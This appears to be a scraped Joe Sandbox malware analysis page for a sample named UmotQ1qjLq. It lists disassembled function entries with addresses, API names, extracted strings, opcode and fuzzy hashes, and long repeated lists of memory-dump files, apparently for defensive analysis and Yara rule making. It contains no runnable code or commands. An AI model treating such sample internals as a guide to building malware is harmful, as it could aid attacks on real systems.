Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: $0Qx$*0Qx$`a
API String ID: 0-2354730689
Opcode ID: 7fa4376f1decc0651aeac37b0e9bc31f14bf9bd4af946400653cc3831dc64e6f
Instruction ID: 180903ff905d0eabf7228f602e27b78dd7f87aeaf33445a264dc225e0c6bab17
Opcode Fuzzy Hash: 7fa4376f1decc0651aeac37b0e9bc31f14bf9bd4af946400653cc3831dc64e6f
Instruction Fuzzy Hash: 65D1E47B618312CBCB288F29D8A136A73F2FF85752F1A84BDC585472A0EB389D51D741

Function 00B2244A Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 464COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL ref: 00B2278D

Strings

%u?}, xrefs: 00B2267B

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: %u?}
API String ID: 237503144-2465729814
Opcode ID: 8bb826eb7127ddf96f0547fb1420bc263397adf0cd6eb0679cfcc62028ac6178
Instruction ID: f20e377dec6ab8edb9e811ad89c4e0134516a2d4f5eb78356b4e1639fd7b0f7f
Opcode Fuzzy Hash: 8bb826eb7127ddf96f0547fb1420bc263397adf0cd6eb0679cfcc62028ac6178
Instruction Fuzzy Hash: 5D1206319087A08FD715CB38C885799BFE16F56320F1DC2E9D4AD9B3E2D6348946CB52

Function 00B43960 Relevance: 3.3, Strings: 2, Instructions: 838COMMON

Download Yara Rule

Strings

(, xrefs: 00B439FB
%*+(, xrefs: 00B43AAF

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: %*+($(
API String ID: 0-3907155128
Opcode ID: 3fc1d270d1b1dd8b7feeea12b80ee9cffa88d5a7aced2036d568126398789487
Instruction ID: 35169bd4ab605121d1782e42d0fc5476b4e4fa144a8f27667b8e9d5718769c43
Opcode Fuzzy Hash: 3fc1d270d1b1dd8b7feeea12b80ee9cffa88d5a7aced2036d568126398789487
Instruction Fuzzy Hash: D872A2F1A16318AFCB998F19DC11B9ABBF9AB49704F1040DDE40DE7390CB721A858F95

Function 00B4C510 Relevance: 3.2, Strings: 2, Instructions: 701COMMON

Download Yara Rule

Strings

f, xrefs: 00B4C7A5
xHLG, xrefs: 00B4C512

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: InitializeThunk
String ID: f$xHLG
API String ID: 2994545307-1062749201
Opcode ID: aab1497c83e8d99b093febe1b32297267cbf84e17202ce5d0c0347a2615f18b2
Instruction ID: 081a7b763b90e9eb067358a3e10233ae964d7607a88201e3f617eaa186e15e3d
Opcode Fuzzy Hash: aab1497c83e8d99b093febe1b32297267cbf84e17202ce5d0c0347a2615f18b2
Instruction Fuzzy Hash: 6B223531A493418FD764CF24C881B2BBBE2EBD4714F198ABCE48597352D771DD41AB82

Function 00B36340 Relevance: 3.2, Strings: 2, Instructions: 688COMMON

Download Yara Rule

Strings

H/'&, xrefs: 00B36EC5, 00B36EE6, 00B36EF1
ur, xrefs: 00B36B69

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: H/'&$ur
API String ID: 0-969745386
Opcode ID: 7aa5206c9b6f212200140cb48fa6e7aebcd6f2ec6642fbd2044e1958756b7892
Instruction ID: 9b9a8ce3e343e9ac818f4bde427dabaef007de6f18210e2e689ed4189b95fa03
Opcode Fuzzy Hash: 7aa5206c9b6f212200140cb48fa6e7aebcd6f2ec6642fbd2044e1958756b7892
Instruction Fuzzy Hash: 4C320672A083518BD728DF29D85176BB7E2EBC5310F1985BCE8899B391DF709C048B96

Function 06A66F60 Relevance: 3.0, Strings: 2, Instructions: 537COMMON

Download Yara Rule

Strings

A&vo, xrefs: 06A6754A
^7{, xrefs: 06A6748A

Memory Dump Source

Source File: 00000000.00000002.2163561702.0000000006A3A000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: true

Associated: 00000000.00000002.2163468208.0000000006A30000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163497130.0000000006A32000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2163527121.0000000006A36000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a30000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: A&vo$^7{
API String ID: 0-2091224192
Opcode ID: 28a79b0776044ace1b36c664db8c22c3cf9e4b6ac424d8f9a63c36e935b57d39
Instruction ID: 35d46341528841b1396117a79bde1ebac68a7c41cb73eccff5ef9f9ffa48c83a
Opcode Fuzzy Hash: 28a79b0776044ace1b36c664db8c22c3cf9e4b6ac424d8f9a63c36e935b57d39
Instruction Fuzzy Hash: FB02C0B3F105104BF3544A39CD58366BA93EBD4320F2B863D9E98AB7C4D97E5D0A8385

Function 00B24DC0 Relevance: 3.0, Strings: 2, Instructions: 530COMMON

Download Yara Rule

Strings

b, xrefs: 00B253B1
30, xrefs: 00B253DD

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
